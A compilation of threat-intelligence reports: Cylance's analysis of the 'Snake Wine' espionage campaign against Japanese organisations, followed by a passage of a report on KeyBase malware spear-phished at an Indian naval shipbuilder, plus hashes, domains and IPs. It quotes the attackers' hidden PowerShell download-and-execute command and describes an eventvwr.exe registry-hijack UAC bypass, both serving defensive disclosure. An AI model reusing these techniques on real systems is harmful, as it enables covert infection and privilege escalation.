Hashes (SHA-256)
Decoy Document:
997841515222dbfa65d1aea79e9e6a89a0142819eaeec3467c31fa169e57076a
Dropper:
f778ca5942d3b762367be1fd85cf7add557d26794fad187c4511b3318aff5cfd
Plugins
Screenshot Collector:
7d97008b00756905195e9fc008bee7c1b398a940e00b0bd4c56920c875f28bfe
dc21527bd925a7dc95b84167c162747069feb2f4e2c1645661a27e63dff8c326
7e4b2edf01e577599d3a2022866512d7dd9d2da7846b8d3eb8cea7507fb6c92a
Keylogger:
fc391f843b265e60de2f44f108b34e64c358f8362507a8c6e2e4c8c689fcdf67
943daa88fe4b5930cc627f14bf422def6bab6d738a4cafd3196f71f1b7c72539
bbe8394eb3b752741df0b30e1d1487eeda7e94e0223055771311939d27d52f78
6c479da2e2cc296c18f21ddecc787562f600088bd37cc2154c467b0af2621937
01aab8341e1ef1a8305cf458db714a0392016432c192332e1cd9f7479507027f
File Collector
06dcf3dc4eab45c7bd5794aafe4d3f72bb75bcfb36bdbf2ba010a5d108b096dc
daf7d349b1b12d9cf2014384a70d5826ca3be6d05df13f7cb1af5b5f5db68d54
24f56ba4d779b913fefed80127e9243303307728ebec85bdb5a61adc50df9eb6
a65e79bdf971631d2097b18e43af9c25f007ae9c5baaa9bda1c470af20e1347c
USB File Collector:
a47e6fab82ac654332f4e56efcc514cb2b45c5a126b9ffcd2c84a842fb0283a2
07c25eebdbd16f176d0907e656224d6a4091eb000419823f989b387b407bfd29
3c0f18157f30414bcfed7a138066bc25ef44a24c5f1e56abb0e2ab5617a91000
Browser Data Collector:
fb836d9897f3e8b1a59ebc00f59486f4c7aec526a9e83b171fd3e8657aadd1a1
966804ac9bc376bede3e1432e5800dd2188decd22c358e6f913fbaaaa5a6114d
296c738805040b5b02eae3cc2b114c27b4fb73fa58bc877b12927492c038e27c
61244d5f47bb442a32c99c9370b53ff9fc2ecb200494c144e8b55069bc2fa166
cae95953c7c4c8219325074addc9432dee640023d18fa08341bf209a42352d7d
a0400125d98f63feecac6cb4c47ed2e0027bd89c111981ea702f767a6ce2ef75
Microphone:
1f5e663882fa6c96eb6aa952b6fa45542c2151d6a9191c1d5d1deb9e814e5a50
912d54589b28ee822c0442b664b2a9f05055ea445c0ec28f3352b227dc6aa2db
691afe0547bd0ab6c955a8ec93febecc298e78342f78b3dd1c8242948c051de6
Computer Info Collector:
c9bf4443135c080fb81ab79910c9cfb2d36d1027c7bf3e29ee2b194168a463a7
10/11
5383e18c66271b210f93bee8cc145b823786637b2b8660bb32475dbe600be46e
d96e5a74da7f9b204f3dfad6d33d2ab29f860f77f5348487f4ef5276f4262311
11/11
The Deception Project: A New Japanese-Centric Threat
cylance.com /en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
In an effort to expose a common problem we see happening in the industry, Cylance
would like to shed some light on just how easy it is to fake attribution. The key factor we should
focus on, as an industry, is determining HOW an attacker can take down an organization, rather than focusing only on the WHO.
Once we can identify how the attack happened, we can focus on what
s really important
prevention.
Background
While investigating some of the smaller name servers that APT28/Sofacy routinely use to host their infrastructure, Cylance discovered another prolonged campaign that appeared to
exclusively target Japanese companies and individuals that began around August 2016. The later registration style was eerily close to previously registered APT28 domains, however, the
malware used in the attacks did not seem to line up at all. During the course of our investigation, JPCERT published this analysis of one of the group
s backdoors. Cylance tracks this
threat group internally as
Snake Wine
We found the infrastructure to be significantly larger than documented at the link above. Cylance believes some of the steps taken by the attacker could possibly be an attempt at a larger
disinformation campaign based upon some of the older infrastructure that would link it to a well-known CN-APT group. Nearly all of the initial data in this case was gathered from delving
further into the domains hosted by
It Itch.
South Korea
s National Intelligence Service (NIS) previously leveraged It Itch
s services, as documented by Citizen Lab in this post. A number of
the samples were signed using the leaked code-signing certificate from the Hacking Team breach.
Propagation and Targeting
To date, all observed attacks were the result of spear phishing attempts against the victim organizations. The latest batch used well-crafted LNK files contained within similarly named
password-protected ZIP files. The LNK files, when opened, would execute a PowerShell command via
cmd.exe /c
to download and execute an additional payload. The attackers
appeared to prefer the Google URL shortening service
goog.gl,
however, this could easily change as the attacks evolve.
powershell.exe -nop
w hidden -exec bypass -enc
JAAyAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGUAeABlAGMAIABiAHkAcABhAHMAcwAgAC0AYwAgACIASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAB
Figure 1: Encoded PowerShell Cmdlet Contained Within the LNK File
$2='-nop -w hidden -exec bypass -c "IEX (New-Object
System.Net.Webclient).DownloadString(''https://goo(dot)gl/cpT1NW'')"';if([IntPtr]::Size -eq 8){$3 =
$env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2";}else{iex "&
powershell $2";}
Figure 2: Decoded PowerShell Snippet
The shortened URL connected to 'hxxxp://koala (dot) acsocietyy (dot) com/acc/image/20170112001 (dot) jpg.' This file was in fact another piece of PowerShell code modified from
PowerSploit'. That file opens a decoy document and executes an approximately 60kb chunk of position independent shellcode. The shellcode upon further decoding and analysis is
nearly identical to what Cylance calls
The Ham Backdoor
below. This particular variant of the backdoor references itself internally as version
1.6.4
and beaconed to
gavin (dot) ccfchrist
(dot) com.
The move to a shellcode-based backdoor was presumably done to decrease overall AV detection and enable deployment via a wider array of methods. A public report released
here documented a similar case in which several universities were targeted by an email purporting to be from The Japanese Society for the Promotion of Science
jsps (dot) go (dot) jp
regarding the need to renew grant funding. The website
koala (dot) asocietyy (dot) com
was also used to host the following PowerShell payloads:
ae0dd5df608f581bbc075a88c48eedeb7ac566ff750e0a1baa7718379941db86 20170112003.jpg
75ef6ea0265d2629c920a6a1c0d1dd91d3c0eda86445c7d67ebb9b30e35a2a9f 20170112002.jpg
723983883fc336cb575875e4e3ff0f19bcf05a2250a44fb7c2395e564ad35d48 20170112007.jpg
3d5e3648653d74e2274bb531d1724a03c2c9941fdf14b8881143f0e34fe50f03 20170112005.jpg
471b7edbd3b344d3e9f18fe61535de6077ea9fd8aa694221529a2ff86b06e856 20170112.jpg
4ff6a97d06e2e843755be8697f3324be36e1ebeb280bb45724962ce4b671029720170112001.jpg
9fbd69da93fbe0e8f57df3161db0b932d01b6593da86222fabef2be31899156d20170112006.jpg
f45b183ef9404166173185b75f2f49f26b2e44b8b81c7caf6b1fc430f373b50b 20170112008.jpg
646f837a9a5efbbdde474411bb48977bff37abfefaa4d04f9fb2a05a23c6d543 20170112004.jpg
The payloads contained within each PowerShell script beaconed to the same domain name, with the exception of
20170112008.jpg
, which beaconed to
hamiltion (dot) catholicmmb (dot)
com.
Earlier attempts used EXE
s disguised with Microsoft Word document icons and DOCX files within a similarly named ZIP file as documented by JPCERT. Cylance has observed the
following ZIP files which contained a similarly named executable:
).zip
2016
1025.zip
.zip
.zip
.zip
.zip
.zip
Malware
The Ham Backdoor
The Ham Backdoor functions primarily as a modular platform, which provides the attacker with the ability to directly download additional modules and execute them in memory from the
command and control (C2) server. The backdoor was programmed in C++ and compiled using Visual Studio 2015. The modules that Cylance has observed so far provided the ability to:
Upload specific files to the C2
Download a file to the infected machine
Load and execute a DLL payload
List running processes and services
Execute a shell command
Add an additional layer of AES encryption to the network protocol
Search for a keyword in files
Legacy AV appears to have fairly good coverage for most of the samples; however, minor changes in newer samples have considerably lower detection rates. JPCERT calls this backdoor
ChChes
for cross-reference. The malware employs a number of techniques for obfuscation, such as stack construction of variables and data, various XOR encodings and data reordering
schemes, and some anti-analysis techniques. Perhaps the most interesting of these, and the one we
ve chosen to key on from a detection perspective, is the following bit of assembly
which was the final component in decoding a large encoded block of code:
lea edx, [esi+edi]
mov edi, [ebp+var_4]
mov cl, [ecx+edx]
xor cl, [eax+edi]
inc eax
mov edi, [ebp+arg_8]
mov [edx], cl
mov ecx, [ebp+arg_0]
cmp eax, ebx
This snippet in the analyzed samples used a fixed size XOR key usually 0x66 bytes long but would sequentially XOR every byte by each value of the key. This effectively results in a
single byte XOR by the end of the operation. This operation made little sense in comparison to the other more complicated reordering and longer XOR encodings used prior to this
mechanism. Cylance only found two variants to this code-block, however, that could be easily modified by the attacker in the future. The code also makes extensive use of the multi-byte
NOP operation prefixed by 0x0F1F. These operations present somewhat of a problem for older disassemblers such as the original Ollydbg, but are trivially patched.
The network protocol of the backdoor is well described by JPCERT, but Cylance has taken the liberty to clean up their original python snippet, which was provided for decoding the cookie
values:
import hashlib
from Crypto.Cipher import ARC4
def network_decode(cookie_data):
data_list = cookie_data.split (';')
dec = []
for i in range(len(data_list)):
tmp = data_list[i]
pos = tmp.find("=")
key = tmp[0:pos]
val = tmp[pos:]
md5 = hashlib.md5()
md5.update(key)
rc4key = md5.hexdigest()[8:24]
rc4 = ARC4.new(rc4key)
dec.append(rc4.decrypt(val.decode("base64"))[len(key):])
print ("[*] decoded:" + "" .join (dec))
Figure 3: Cleaned Script Originally by JPCERT
As noted in the JPCERT report, Cylance also found that in most cases of successful infection, one of the earliest modules downloaded onto the system added an additional layer of AES
communication to the traffic. The backdoor would also issue anomalous HTTP requests with the method
in the event that the C2 server did not respond appropriately to the initial
request.
An example request is shown below:
ST /2C/H.htm HTTP/1.1
Cookie: uQ=[REDACTED];omWwFSA=hw4biTXvqd%2FhK2TIyoLYj1%2FShw6MhEGHlWurHsUyekeuunmop4kZ;Tgnfm5E=RPBaxi%2Bf4B2r6CTd9jh5u3AHOwuyVaJeuw%3D%3D
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET
CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)
Host: kawasaki.unhamj(dot)com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
Figure 4: Example Request Using the
Method
The majority of the Ham Backdoors found to date have all been signed using the stolen and leaked Hacking Team code-signing certificate.
HT Srl
Certificate Details:
Status: Revoked
Issuer: VeriSign Class 3 Code Signing 2010 CA
Valid: 1:00 AM 8/5/2011 to 12:59 AM 8/5/2012
Thumbprint: B366DBE8B3E81915CA5C5170C65DCAD8348B11F0
Serial Number: 3F FC EB A8 3F E0 0F EF 97 F6 3C D9 2E 77 EB B9
Why the attackers chose to use this expired certificate to sign their malware samples is unknown. The malware itself bears little resemblance to previous hacking team implants and was
likely done purely as an attempt to throw off attribution. The only observed persistence method to date is the use of the standard Windows Run key
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
under either a user
s hive or HKLM. Cylance found that the following three full file paths were commonly used by this particular
backdoor:
%AppData%\Reader.exe
%AppData%\Notron.exe
%AppData%\SCSI_Initiarot.exe
Cylance also identified an earlier sample, which took advantage of a self-extracting RAR and a side loading vulnerability in the legitimate Microsoft Resource Compiler,
RC.exe.
RC.exe
will load the DLL
RCDLL.dll
via its import table. This modified DLL was responsible for XOR decoding and mapping the shellcode version of the Ham Backdoor. This particular sample
was stored in a file called
RC.cfg
, which was encoded using a single byte XOR against the key of 0x54. It appears that this version was only used in early campaigns, as the latest
referenced backdoor version Cylance identified was
v1.2.2.
Tofu Backdoor
Based upon Cylance
s observations, the Tofu Backdoor was deployed in far fewer instances than the Ham Backdoor. It is a proxy-aware, fully-featured backdoor programmed in C++ and
compiled using Visual Studio 2015. The Tofu backdoor makes extensive use of threading to perform individual tasks within the code. It communicates with its C2 server through HTTP
over nonstandard TCP ports, and will send encoded information containing basic system information back, including hostname, username, and operating system within the content of the
POST.
POST /586E32A1FFFFFFFF.aspx HTTP/1.1
Accept: */*
Cookies: Sym1.0: 0
,Sym2.0: 0
,Sym3.0: 61456
,Sym4.0: 1
Host: area.wthelpdesk.com:443
Content-Length: 39
Connection: Keep-Alive
Cache-Control: no-cache
Figure 5: Example POST Request From the Tofu Backdoor
Although communication took place on TCP port 443, none of the traffic was encrypted and the custom cookies
Sym1.0
Sym4.0
can be used to easily identify the backdoor in network
traffic. The backdoor has the ability to enumerate processor, memory, drive, and volume information, execute commands directly from the attacker, enumerate and remove files and
folders, and upload and download files. Commands were sent by the C2 and processed by the backdoor in the form of encoded DWORDs, each correspondeding to a particular action
listed above. Tofu may also create two different bi-directional named pipes on the system
\\.\pipe\1[12345678]
and
\\.\pipe\2[12345678]
which could be accessed via other compromised
machines on the internal network.
During an active investigation, the file was found at
%AppData%\iSCSI_Initiarot.exe
. This path was confirmed as a static location in the code that the backdoor would use to copy itself. A
static Run key was also used by the backdoor to establish persistence on the victim machine (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft iSCSI Initiator).
All of the samples Cylance identified were compiled in November 2016, so these backdoors may have simply been tests as later samples moved back to the shellcode-based Ham
Backdoors. The backdoors were also similarly signed using the same stolen code-signing certificate from
HT Srl.
C2 Infrastructure
Cylance found that at least half of the infrastructure associated with The Deception Project appeared to be dark or at least unused. This suggests that the Snake Wine group will likely
continue to escalate their activity and persistently target both private and government entities within Japan.
Cylance also found an extensive network of Dynamic DNS (DDNS) domains registered via multiple free providers was likely being used by the same group. However, Cylance was unable
to identify any current samples which communicated with this infrastructure, and have subsequently separated this activity from the rest of the attacker
s infrastructure. Many of the DDNS
domains were concocted to mimic legitimate windows update domains such as
download.windowsupdate(dot)com
ipv4.windowsupdate(dot)com
, and
v4.windowsupdate(dot)com
Domain Registration Information:
8/19/16
8/19/16
8/19/16
9/6/16
9/6/16
9/12/16
9/12/16
9/12/16
11/3/16
11/3/16
11/3/16
11/4/16
11/4/16
12/6/16
12/6/16
12/7/16
12/7/16
12/7/16
12/7/16
12/7/16
12/8/16
12/8/16
12/8/16
12/8/16
12/8/16
12/11/16
12/12/16
12/12/16
12/12/16
12/13/16
12/13/16
12/13/16
12/20/16
12/21/16
12/26/16
12/27/16
12/27/16
12/27/16
2/9/17
2/14/2017
wchildress(dot)com
poulsenv(dot)com
toshste(dot)com
shenajou(dot)com
ixrayeye(dot)com
wthelpdesk(dot)com
bdoncloud(dot)com
belowto(dot)com
incloud-go(dot)com
unhamj(dot)com
cloud-maste(dot)com
cloud-kingl(dot)com
incloud-obert(dot)com
fftpoor(dot)com
ccfchrist(dot)com
catholicmmb(dot)com
usffunicef(dot)com
cwiinatonal(dot)com
tffghelth(dot)com
acsocietyy(dot)com
tokyo-gojp(dot)com
salvaiona(dot)com
osaka-jpgo(dot)com
tyoto-go-jp(dot)com
fastmail2(dot)com
wcwname(dot)com
dedgesuite(dot)net
wdsupdates(dot)com
nsatcdns(dot)com
vscue(dot)com
sindeali(dot)com
vmmini(dot)com
u-tokyo-ac-jp(dot)com
meiji-ac-jp(dot)com
jica-go-jp(dot)bike
mofa-go-jp(dot)com
jimin-jp(dot)biz
jica-go-jp(dot)biz
jpcert(dot)org
ijica(dot)in
abellonav.poulsen(at)yandex.com
abellonav.poulsen(at)yandex.com
toshsteffensen2(at)yandex.com
ShenaJouellette(at)india.com
BettyWBatts(at)india.com
ArmandOValcala(at)india.com
GloriaRPaige(at)india.com
RobertoRivera(at)india.com
RufinaRWebb(at)india.com
JuanitaRDunham(at)india.com
MeganFDelgado(at)india.com
ElisabethBGreen(at)india.com
RobertJButler(at)india.com
SteveCBrown(at)india.com
WenonaTMcMurray(at)india.com
EmilyGLessard(at)india.com
MarisaKParr(at)india.com
RobertMKnight(at)india.com
NathanABecker(at)india.com
PearlJBrown(at)india.com
VeraTPerkins(at)india.com
DeborahAStutler(at)india.com
JudithAMartel(at)india.com
AletaFNowak(at)india.com
ClementBCarico(at)india.com
CynthiaRNickerson(at)india.com
KatherineKTaggart(at)india.com
GordonESlavin(at)india.com
SarahNBosch(at)india.com
ChrisTDawkins(at)india.com
DonnaJMcCray(at)india.com
RaymondRKimbrell(at)india.com
LynnJOwens(at)india.com
PearlJPoole(at)india.com
AliceCLopez(at)india.com
AngelaJBirkholz(at)india.com
EsmeraldaTYates(at)india.com
RonaldSFreeman(at)india.com
GinaKPiller(at)india.com
DarrenMCrow(at)india.com
2/17/2017
2/17/2017
2/17/2017
chibashiri(dot)com
essashi(dot)com
urearapetsu(dot)com
WitaTBiles(at)india.com
CarlosBPierson(at)india.com
IvoryDStallcup(at)india.com
Full Domain List:
area.wthelpdesk(dot)com
cdn.incloud-go(dot)com
center.shenajou(dot)com
commissioner.shenajou(dot)com
development.shenajou(dot)com
dick.ccfchrist(dot)com
document.shenajou(dot)com
download.windowsupdate.dedgesuite(dot)net
edgar.ccfchrist(dot)com
ewe.toshste(dot)com
fabian.ccfchrist(dot)com
flea.poulsenv(dot)com
foal.wchildress(dot)com
fukuoka.cloud-maste(dot)com
gavin.ccfchrist(dot)com
glicense.shenajou(dot)com
hamiltion.catholicmmb(dot)com
hukuoka.cloud-maste(dot)com
images.tyoto-go-jp(dot)com
interpreter.shenajou(dot)com
james.tffghelth(dot)com
kawasaki.cloud-maste(dot)com
kawasaki.unhamj(dot)com
kennedy.tffghelth(dot)com
lennon.fftpoor(dot)com
license.shenajou(dot)com
lion.wchildress(dot)com
lizard.poulsenv(dot)com
malcolm.fftpoor(dot)com
ms.ecc.u-tokyo-ac-jp(dot)com
msn.incloud-go(dot)com
sakai.unhamj(dot)com
sappore.cloud-maste(dot)com
sapporo.cloud-maste(dot)com
scorpion.poulsenv(dot)com
shrimp.bdoncloud(dot)com
sindeali(dot)com
style.u-tokyo-ac-jp(dot)com
trout.belowto(dot)com
ukuoka.cloud-maste(dot)com
v4.windowsupdate.dedgesuite(dot)net
vmmini(dot)com
whale.toshste(dot)com
windowsupdate.dedgesuite(dot)net
windowsupdate.wcwname(dot)com
www.cloud-maste(dot)com
www.foal.wchildress(dot)com
www.fukuoka.cloud-maste(dot)com
www.incloud-go(dot)com
www.kawasaki.cloud-maste(dot)com
www.kawasaki.unhamj(dot)com
www.lion.wchildress(dot)com
www.msn.incloud-go(dot)com
www.sakai.unhamj(dot)com
www.sapporo.cloud-maste(dot)com
www.unhamj(dot)com
www.ut-portal-u-tokyo-ac-jp.tyoto-go-jp(dot)com
www.vmmini(dot)com
www.wchildress(dot)com
www.yahoo.incloud-go(dot)com
yahoo.incloud-go(dot)com
zebra.bdoncloud(dot)com
zebra.incloud-go(dot)com
zebra.wthelpdesk(dot)com
IP Addresses:
107.181.160.109
109.237.108.202
151.101.100.73
151.236.20.16
158.255.208.170
158.255.208.189
158.255.208.61
160.202.163.79
160.202.163.82
160.202.163.90
160.202.163.91
169.239.128.143
185.117.88.81
185.133.40.63
185.141.25.33
211.110.17.209
31.184.198.23
31.184.198.38
92.242.144.2
Anomalous IP Crossover
One of the most perplexing aspects of tracing the infrastructure associated with this particular campaign is that it appeared to lead to a significant number of well-known
MenuPass
Stone Panda
domains. MenuPass is a well-documented CN-APT group, whose roots go back to 2009. The group was first publicly disclosed by FireEye in this report. However, many of
those domains were inactive for as long as two years and could have easily been re-registered by another entity looking to obfuscate attribution.
As a result, we
ve only included recent Dynamic DNS domains that were connected to recently registered infrastructure. A much larger collection of information is available to trusted and
interested parties. Please contact us at: deceptionproject (at) Cylance [dot] com.
Dynamic DNS IPs:
37.235.52.18
78.153.151.222
175.126.148.111
95.183.52.57
109.237.108.202
109.248.222.85
2016-05-11
2016-05-13
2016-07-14
2016-07-26
2016-12-26
2016-12-27
Dynamic DNS Domains:
blaaaaaaaaaaaa.windowsupdate(dot)3-a.net
contract.4mydomain(dot)com
contractus.qpoe(dot)com
ctdl.windowsupdate.itsaol(dot)com
ctldl.microsoftupdate.qhigh(dot)com
ctldl.windowsupdate.authorizeddns(dot)org
ctldl.windowsupdate.authorizeddns(dot)us
ctldl.windowsupdate.dnset(dot)com
ctldl.windowsupdate.lflinkup(dot)com
ctldl.windowsupdate.x24hr(dot)com
download.windowsupdate.authorizeddns(dot)org
download.windowsupdate.dnset(dot)com
download.windowsupdate.itsaol(dot)com
download.windowsupdate.lflinkup(dot)com
download.windowsupdate.x24hr(dot)com
ea.onmypc(dot)info
eu.wha(dot)la
feed.jungleheart(dot)com
fire.mrface(dot)com
fuck.ikwb(dot)com
globalnews.wikaba(dot)com
helpus.ddns(dot)info
home.trickip(dot)org
imap.dnset(dot)com
ipv4.windowsupdate.3-a(dot)net
ipv4.windowsupdate.authorizeddns(dot)org
ipv4.windowsupdate.dnset(dot)com
ipv4.windowsupdate.fartit(dot)com
ipv4.windowsupdate.lflink(dot)com
ipv4.windowsupdate.lflinkup(dot)com
ipv4.windowsupdate.mylftv(dot)com
ipv4.windowsupdate.x24hr(dot)com
latestnews.organiccrap(dot)com
microsoftmirror.mrbasic(dot)com
microsoftmusic.itemdb(dot)com
microsoftstore.onmypc(dot)net
microsoftupdate.qhigh(dot)com
mobile.2waky(dot)com
mseupdate.ourhobby(dot)com
newsreport.justdied(dot)com
nmrx.mrbonus(dot)com
outlook.otzo(dot)com
referred.gr8domain(dot)biz
twx.mynumber(dot)org
v4.windowsupdate.authorizeddns(dot)org
v4.windowsupdate.dnset(dot)com
v4.windowsupdate.itsaol(dot)com
v4.windowsupdate.lflinkup(dot)com
v4.windowsupdate.x24hr(dot)com
visualstudio.authorizeddns(dot)net
windowsupdate.2waky(dot)com
windowsupdate.3-a(dot)net
windowsupdate.acmetoy(dot)com
windowsupdate.authorizeddns(dot)net
windowsupdate.authorizeddns(dot)org
windowsupdate.dns05(dot)com
windowsupdate.dnset(dot)com
windowsupdate.esmtp(dot)biz
windowsupdate.ezua(dot)com
windowsupdate.fartit(dot)com
windowsupdate.itsaol(dot)com
windowsupdate.lflink(dot)com
windowsupdate.mrface(dot)com
windowsupdate.mylftv(dot)com
windowsupdate.x24hr(dot)com
www.contractus.qpoe(dot)com
www.feed.jungleheart(dot)com
www.helpus.ddns(dot)info
www.latestnews.organiccrap(dot)com
www.microsoftmirror.mrbasic(dot)com
www.microsoftmusic.itemdb(dot)com
www.microsoftstore.onmypc(dot)net
www.mobile.2waky(dot)com
www.mseupdate.ourhobby(dot)com
www.nmrx.mrbonus(dot)com
www.twx.mynumber(dot)org
www.visualstudio.authorizeddns(dot)net
www.windowsupdate.acmetoy(dot)com
www.windowsupdate.authorizeddns(dot)net
www.windowsupdate.authorizeddns(dot)org
www.windowsupdate.dnset(dot)com
www.windowsupdate.itsaol(dot)com
www.windowsupdate.x24hr(dot)com
www2.qpoe(dot)com
www2.zyns(dot)com
www2.zzux(dot)com
Conclusion
The Snake Wine group has proven to be highly adaptable and has continued to adopt new tactics in order to establish footholds inside victim environments. The exclusive interest in
Japanese government, education, and commerce will likely continue into the future as the group is just starting to build and utilize their existing current attack infrastructure.
If the past is an accurate indicator, attacks will continue to escalate in both skill and intensity as the attackers implement new tactics in response to defenders acting on previously released
information.
Perhaps the most interesting aspect of the Snake Wine group is the number of techniques used to obscure attribution. Signing the malware with a stolen and subsequently publicly leaked
code-signing certificate is sloppy even for well-known CN-APT groups. Also of particular interest from an attribution obfuscation perspective is direct IP crossover with previous Dynamic
DNS domains associated with known CN-APT activity. A direct trail was established over a period of years that would lead competent researchers to finger CN operators as responsible
for this new activity as well.
Although the MenuPass Group used mostly publicly available RATs, they were successful in penetrating a number of high value targets, so it is entirely possible this is indeed a
continuation of past activity. However, Cylance does not believe this scenario to be probable, as a significant amount of time has elapsed between the activity sets. Also of particular
interest was the use of a domain hosting company that accepts BTC and was previously heavily leveraged by the well-known Russian group APT28.
In any case, Cylance hopes to better equip defenders to detect and respond to active threats within their network and enable the broader security community to respond to similar threats.
In terms of defending and responding to malware, attribution is rarely important. As new methodologies become more broadly detected, threat actors will continue to embrace alternate
and new strategies to continue achieving their objectives.
Yara Rules
Yara rules for this campaign can be found on GitHub here: https://github.com/CylanceSPEAR/IOCs/blob/master/snake.wine.yar
If you use our endpoint protection product, CylancePROTECT
, you were already protected from this attack. If you don't have CylancePROTECT, contact us to learn how our AI based
solution can predict and prevent unknown and emerging threats.
Cyber Attack Targeting Indian Navy
s Submarine and Warship
Manufacturer
cysinfo.com/cyber-attack-targeting-indian-navys-submarine-warship-manufacturer/
2/10/2017
In my previous blog posts I described attack campaigns targeting Indian government organizations, and Indian
Embassies and Ministry of External affairs. In this blog post I describe a new attack campaign where cyber
espionage group targeted the users of Mazagon Dock Shipbuilders Limited (also called as ship builder to the
nation). Mazagon Dock Shipbuilders Limited (MDL) is a Public Sector Undertaking of Government of India (Ministry
of Defence) and it specializes in manufacturing warships and submarines for the Indian Navy.
In order to infect the users associated with Mazagon Dock Shipbuilders Limited (MDL), the attackers distributed
spear-phishing emails containing malicious excel file which when opened drops a malware capable of spying on
infected systems. The email purported to have been sent from legitimate email ids. The attackers spoofed the email
id associated with a Spain based equipment manufacturing company Hidrofersa which specializes in designing,
manufacturing naval, industrial and mining machinery.
Overview of the Malicious Emails
On 26th January, 2017 Indian Navy displayed its state-of-the-art stealth guided missile destroyer INS Chennai and
the indigenously-made Kalvari class Scorpene submarines at the Republic Day parade showcasing India
s military
strength and achievements. INS Chennai and Kalvari class submarines were manufactured by Mazagon Dock
Shipbuilders Limited (MDL).
On 25th January (day before the Republic day) attackers spoofed an email id associated with Hidrofersa a Spain
based company which specializes in designing, manufacturing naval, industrial and mining machinery and the email
was sent to the users of Mazagon Dock Shipbuilders Limited (MDL). The email attachment contained two malicious
excel files (both excel files turned out to be same but used different names). The email was made to look like it was
sent by a General service manager of Hidrofersa enquiring about the product delivery schedule.
Below screen shot shows the recipients associated with Mazagon Dock Shipbuilders Limited (MDL), this information
1/13
was determined from the Email header.
Mazagon Dock Shipbuilders Limited (MDL) is listed as one of clients of Hidrofersa (mentioned in Hidrofersa
website) and as per their website Hidrofersa has shipped equipments to Mazagon Dock Shipbuilders Limited (MDL)
in the past as shown in the below screen shots. This is probably the reason attackers spoofed the email id of
Hidrofersa as it is less likely to trigger any suspicion and there is high chance of recipients opening the attachment
as it is coming from a trusted equipment manufacturer (Hidrofersa) . It looks like attackers carefully researched (or
they already knew about) the trust relationship between these two companies.
From the email it looks like the goal of the attackers was to infect, take control of the systems of users associated
with Mazagon Dock Shipbuilders Limited (MDL) and to steal sensitive information (like Product design documents,
blueprints, manufacturing processes etc) related to warships and submarines.
Analysis of Malicious Excel File
When the recipient of the email opens the attached excel file it prompts the user to enable macro content and the
excel also contains instruction on how to enable the macros.
2/13
Once the the macro content is enabled, it calls an auto execute function Workbook_Open() which in turn downloads
the malware sample and executes on the system. The malicious macro code was reverse engineered to understand
its capabilities. The macro code was heavily obfuscated (used obscure variable/function names to make analysis
harder) as shown below.
The macro also contained lot of junk code, unnecessary comments and variable assignments as shown below. The
attackers used this technique to delay, divert and confuse the manual analysis.
3/13
The macro then decodes a string which runs PowerShell script to download malware from a popular university site
located in Indonesia as shown below. The attackers probably compromised the university website to host the
malware. The technique of hosting malicious code in a university site (legitimate site) has advantages and it is
unlikely to trigger any suspicion in security monitoring and also can bypass reputation based devices.
The PowerShell script (shown below) drops the downloaded executable in the %TEMP% directory as
doc6.exe
. It
then adds a registry entry for the dropped executable and invokes eventvwr.exe, this is an interesting registry hijack
technique which allows the doc6.exe to be executed by eventvwr.exe with high integrity level and also this
technique silently bypasses the UAC (user account control). This technique of UAC bypass is mentioned in the blog
Fileless
UAC Bypass Using eventvwr.exe and Registry Hijacking
4/13
Normally when eventvwr.exe process (which is running as high integrity process) is invoked, it starts mmc.exe which
opens eventvwr.msc causing the Event Viewer to be displayed. To start mmc.exe, eventvwr.exe searches this
registry key
HKCU\Software\Classes\mscfile\shell\open\command
looking for mmc.exe before looking at
HKCR\mscfile\shell\open\command.
In this case since this registry
HKCU\Software\Classes\mscfile\shell\open\command
was hijacked to contain the
entry for
doc6.exe
, this will cause the eventvwr.exe process to invoke doc6.exe with high integrity level.
Below screen shot shows doc6.exe running from the %TEMP% directory
The dropped file (doc6.exe) was determined as KeyBase malware. This malware can steal and send sensitive
information to the attackers like keystrokes, opened applications, web browsing history, usernames/passwords,
upload Desktop screen shots etc. The feature of uploading the Desktop screen shot is notable because if the
infected user opens a design or design document related to submarines or warships the screen shot of that can be
sent to the attacker.
The attackers also hosted multiple samples of KeyBase malware in the compromised university website. Below
screen shot shows hashes of 25 samples hosted on the university site.
5/13
Analysis of the Dropped Executable (doc6.exe)
The dropped file was analyzed in an isolated environment (without actually allowing it to connect to the c2 server).
This section contains the behavioral analysis of the dropped executable
Once the dropped file (doc6.exe) is executed the malware copies itself into %AllUsersProfile% directory as
Important.exe
, In addition to that it also drops two files
Mails.txt
and
Browsers.txt
into the same directory as
shown below.
The malware then creates a registry value for the the dropped file (Important.exe), this ensures that malware is
executed every time the system restarts.
6/13
The malware after execution keeps track of the user activity (like applications opened, files opened etc) but does not
immediately generate any network traffic, this is to make sure that no network activity is generated during
automated/sandbox analysis. After sleeping for a long time malware makes an http connection to the C2 server
(command & control server) and sends the tracked user activity to the attacker. The below screen shot shows the
communication to the C2 server on port 80.
C2 Communication Pattern
Once malware makes an http connection after sleeping for a long time, it sends the system information and the
tracked activity to the C2 server as http parameters. Below screen shot shows the network communication pattern
where the hostname and the machine time is sent to C2 server.
Below screen shot shows a network communication pattern where the opened window title was sent to the C2
server, this pattern below indicates that
test.txt
file was opened with notepad on the infected system.
7/13
Below screen shot shows a network communication pattern indicating a document named
secret.docx
was
opened with Microsoft Word.
Below screen shot shows a network communication pattern indicating Internet Explorer was launched on the
infected system.
Every activity on the infected system is sent to the attacker, this allows the attacker to take further action and also
since the open window title is sent to attacker, this lets the attacker know about the documents opened and the tools
running on the system or if any analysis tools are used to inspect the malware.
C2 Domain Information
This section contains the details of the C2 domain (tripleshop[.]id). All the 25 samples hosted on compromised
university site was analyzed and it was determined that all these samples also communicated to the C2 domain
tripleshop[.]id
8/13
The C2 domain was associated with only one IP address . This IP address is associated with hosting provider in
Indonesia as shown in the screen shots below
Below screen shot shows the timeline when the IP address was active. The IP was first seen to be active on 18th
Jan, 2017 (one week before the spear-phishing mail was sent to the victims).
Threat Intelligence
